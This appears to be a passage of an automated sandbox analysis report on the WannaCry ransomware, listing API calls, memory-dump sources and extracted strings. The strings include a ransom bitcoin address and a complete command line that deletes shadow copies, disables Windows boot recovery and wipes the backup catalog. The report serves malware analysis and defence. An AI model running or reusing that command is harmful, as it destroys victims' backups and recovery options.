      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    • WSAStartup.WS2_32(00000202,?), ref: 004065FA
    • __p___argc.MSVCRT ref: 00406600
    • __p___argv.MSVCRT ref: 0040661A
    • ExitProcess.KERNEL32 ref: 0040665B
    • __p___argv.MSVCRT ref: 00406666
    • ExitProcess.KERNEL32 ref: 004066A7
    • __p___argv.MSVCRT ref: 004066B2
    • Sleep.KERNEL32(00002710), ref: 004066F3
      • Part of subcall function 00401BB0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
      • Part of subcall function 00401BB0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
      • Part of subcall function 00401BB0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
    • ExitProcess.KERNEL32 ref: 00406786
      • Part of subcall function 00401B50: ShellExecuteExA.SHELL32 ref: 00401B9D
    • sprintf.MSVCRT ref: 0040676A
      • Part of subcall function 00401A90: CreateProcessA.KERNEL32 ref: 00401AE3
      • Part of subcall function 00401A90: WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
      • Part of subcall function 00401A90: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
      • Part of subcall function 00401A90: GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B31
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B38
      • Part of subcall function 004080C0: FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
      • Part of subcall function 004080C0: sscanf.MSVCRT ref: 0040816A
      • Part of subcall function 004080C0: fopen.MSVCRT ref: 00408185
      • Part of subcall function 004080C0: fread.MSVCRT ref: 004081A0
      • Part of subcall function 004080C0: fclose.MSVCRT ref: 004081BE
      • Part of subcall function 004080C0: FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
      • Part of subcall function 004080C0: FindClose.KERNEL32(?), ref: 00408200
      • Part of subcall function 004080C0: sprintf.MSVCRT ref: 00408266
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
      • Part of subcall function 00407F80: fopen.MSVCRT ref: 00407FBD
      • Part of subcall function 00407F80: fread.MSVCRT ref: 00407FDD
      • Part of subcall function 00407F80: fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 00407E80: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
      • Part of subcall function 00407E80: wcslen.MSVCRT ref: 00407EF4
      • Part of subcall function 00407E80: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
      • Part of subcall function 00407E80: MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
      • Part of subcall function 00407E80: CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
      • Part of subcall function 00407E80: SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FBC
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00121284), ref: 00406FC6
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FCF
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FE2
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00406FF5
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00000000), ref: 00406FFC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407005
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(003834D1), ref: 0040700F
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407018
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00107C10), ref: 00407022
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040702B
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E8A200), ref: 00407035
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040703E
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00D77800), ref: 00407048
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407051
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 00407064
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,0001DAA0,?), ref: 0040709C
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
      • Part of subcall function 00406C20: GetUserDefaultLangID.KERNEL32 ref: 00406C3B
      • Part of subcall function 00406C20: GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
      • Part of subcall function 00406C20: SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
    • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
    Strings
    • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
    • Wana Decrypt0r 2.0, xrefs: 00406796
    • %s %s, xrefs: 00406764
    • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
    • cmd.exe, xrefs: 0040671C
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00405A60, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
    APIs
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
    • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
    • #2621.MFC42 ref: 00405A96
    • #6438.MFC42 ref: 00405A9B
      • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
    • #2514.MFC42 ref: 00405AC1
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
      • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
    • #800.MFC42 ref: 00405C33
    • #800.MFC42 ref: 00405C47
    • #800.MFC42 ref: 00405C5B
    • #800.MFC42 ref: 00405C6F
    • #781.MFC42 ref: 00405C83
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42 ref: 00405D37
    • #609.MFC42 ref: 00405D4B
    • #616.MFC42 ref: 00405D5C
    • #641.MFC42 ref: 00405D70
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407A90, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90
    APIs
      • Part of subcall function 00404C40: #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
      • Part of subcall function 00404C40: #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
      • Part of subcall function 00404C40: #860.MFC42(00421798), ref: 00404CAD
    • #2514.MFC42 ref: 00407AF1
    • #537.MFC42(***), ref: 00407B04
    • #941.MFC42(00421234,***), ref: 00407B1A
    • #939.MFC42(?,00421234,***), ref: 00407B28
    • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
    • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
    • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
    • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
    • #2385.MFC42(?,?,?), ref: 00407C0E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004063A0, Relevance: 22.6, APIs: 15, Instructions: 82
    APIs
    • #2302.MFC42(?,0000040F,?), ref: 004063B2
    • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
    • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
    • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
    • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
    • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
    • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
    • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
    • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
    • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
    • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
    • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
    • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
    • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
    • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 0040B620, Relevance: 13.5, APIs: 9, Instructions: 45
    APIs
    • FindWindowW.USER32(00000000,00000000), ref: 0040B628
    • ShowWindow.USER32(00000000,00000005), ref: 0040B638
    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
    • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
    • SetForegroundWindow.USER32(00000000), ref: 0040B663
    • SetFocus.USER32(00000000), ref: 0040B66A
    • SetActiveWindow.USER32(00000000), ref: 0040B671
    • BringWindowToTop.USER32(00000000), ref: 0040B678
    • ExitProcess.KERNEL32 ref: 0040B689
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401A10, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004043E0, Relevance: 4.5, APIs: 3, Instructions: 15
    APIs
    • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
    • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
    • #5277.MFC42 ref: 00404402
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004133E6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
    APIs
    • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd

    Non-executed Functions

    Function 004026B0, Relevance: 51.1, APIs: 24, Strings: 5, Instructions: 318
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • swprintf.MSVCRT ref: 00402728
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
    • wcscmp.MSVCRT ref: 004027E1
    • wcscmp.MSVCRT ref: 004027FB
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
    • GetFileAttributesW.KERNEL32(?), ref: 00402830
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 00402AF0: _wcsnicmp.MSVCRT ref: 00402AFF
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402B18
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B39
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B53
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B6D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402B87
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BA1
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BBB
      • Part of subcall function 00402AF0: wcsstr.MSVCRT ref: 00402BD5
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402BF3
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C0D
      • Part of subcall function 00402AF0: _wcsicmp.MSVCRT ref: 00402C27
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
    • wcslen.MSVCRT ref: 0040286E
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
    • wcscmp.MSVCRT ref: 004028C3
    • wcscmp.MSVCRT ref: 004028DD
    • wcscmp.MSVCRT ref: 004028F3
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
    • wcslen.MSVCRT ref: 00402914
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 00402DA0: #823.MFC42(00000018,0001D3EC,0001D42E,?,00000000,00402949), ref: 00402DAF
    • FindNextFileW.KERNEL32(?,?), ref: 0040296A
    • FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 00402560: wcscpy.MSVCRT ref: 0040257D
      • Part of subcall function 00402560: wcsrchr.MSVCRT ref: 0040258A
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025A5
      • Part of subcall function 00402560: _wcsicmp.MSVCRT ref: 004025B4
      • Part of subcall function 00402560: wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
    • #825.MFC42(?), ref: 00402A6B
    • #825.MFC42(?), ref: 00402ABF
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EC8
      • Part of subcall function 00402E90: #825.MFC42(?,?,?,?,00402AB4,?,?,?,00000000), ref: 00402EE6
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00403CB0, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
    • sscanf.MSVCRT ref: 00403D26
    • fopen.MSVCRT ref: 00403D45
    • fread.MSVCRT ref: 00403D69
    • sprintf.MSVCRT ref: 00403D99
      • Part of subcall function 00401C30: #12.WS2_32(?), ref: 00401C3F
    • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
    • #823.MFC42(00000088), ref: 00403DE4
    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
    • fclose.MSVCRT ref: 00403E16
    • FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
    • FindClose.KERNEL32(?), ref: 00403E3B
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004080C0, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143
    APIs
    • FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
    • sscanf.MSVCRT ref: 0040816A
    • fopen.MSVCRT ref: 00408185
    • fread.MSVCRT ref: 004081A0
    • fclose.MSVCRT ref: 004081BE
    • FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
    • FindClose.KERNEL32(?), ref: 00408200
    • sprintf.MSVCRT ref: 00408266
    • #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
